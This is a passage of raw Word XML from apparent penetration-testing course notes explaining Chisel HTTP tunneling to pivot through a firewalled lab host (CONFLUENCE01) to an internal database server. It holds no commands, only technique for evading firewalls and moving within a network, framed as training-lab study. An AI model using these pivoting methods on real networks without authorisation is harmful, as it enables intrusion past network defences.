      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once Chisel connects, we can browse to port 80 on 172.16.6.241 via port 80 on our Kali machine (127.0.0.1) by using Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If any pages don't load, add any host names you see in the URL to /etc/hosts to resolve host names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then try both the IP and the hostname, since in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the IP didn't work but when I tried the hostname directly instead of the IP, it worked. This was not for tunneling btw. It was just getting a website to load</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eatwn0iq8hwj" w:id="86"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Reverse Dynamic Port Forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I would recommend you look at this simple guide below, which teaches how to do all the different styles of port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId203">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the examples, the "targets" are actually ports on the "middle man." This is technically a valid target, since the ports are only open to localhost on middle man, so you need to pivot to middle man in order to access these target ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But when you use these commands, you can change the target ports to another machine separate to middleman that is accessible from middleman and not your Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009DF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 20.1. HTTP Tunneling Theory and Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: This XXXXXXXXX guide only teaches us how to do Reverse Port Forwarding with Chisel. In the next section, I will teach how to do Regular port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: This section also teaches us how to run SSH through a SOCKS proxy. And spoiler, you can't just run it through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling is great when SSH is not available, or if it's blocked by a firewall. On the other hand, it's pretty common to see HTTP servers open and allowed to pass through firewalls. </w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="311" name="image317.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image317.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId204"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="238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EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal is to get from Kali machine to PGDATABASE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nothing can get in and out of the firewall between Kali and MULTISERVER03, so we have to go through CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="494"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 firewall only allows TCP/8090 inbound (which is the webserver), and only allows HTTP outbound.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The above is a perfect scenario for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, an HTTP tunneling tool that encapsulates our data stream within HTTP. It also uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">protocol within the tunnel so our data will be encrypted.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel uses a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client/server model</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">must be set up, which can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a connection from the Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Various port forwarding options are available depending on the server and client configurations. One option that is particularly useful for us is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH remote port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: Chisel can run on macOS, Linux, and Windows, and on various architectures on each. Older tools like HTTPTunnel offer similar tunneling functionality but lack the flexibility and cross-platform capabilities of Chisel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F5">
      <w:pPr>
        <w:ind w:left="-630" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6840967" cy="2795588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="569" name="image542.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image542.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6840967" cy="2795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F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">THIS IS AN EXAMPLE OF </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CHISEL reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will run a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine, which will accept a connection from a Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">running on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel will bind a SOCKS proxy port on the Kali machine (Chisel Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Chisel server (Kali) will encapsulate whatever we send through the SOCKS port and push it through the HTTP tunnel, SSH-encrypted. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
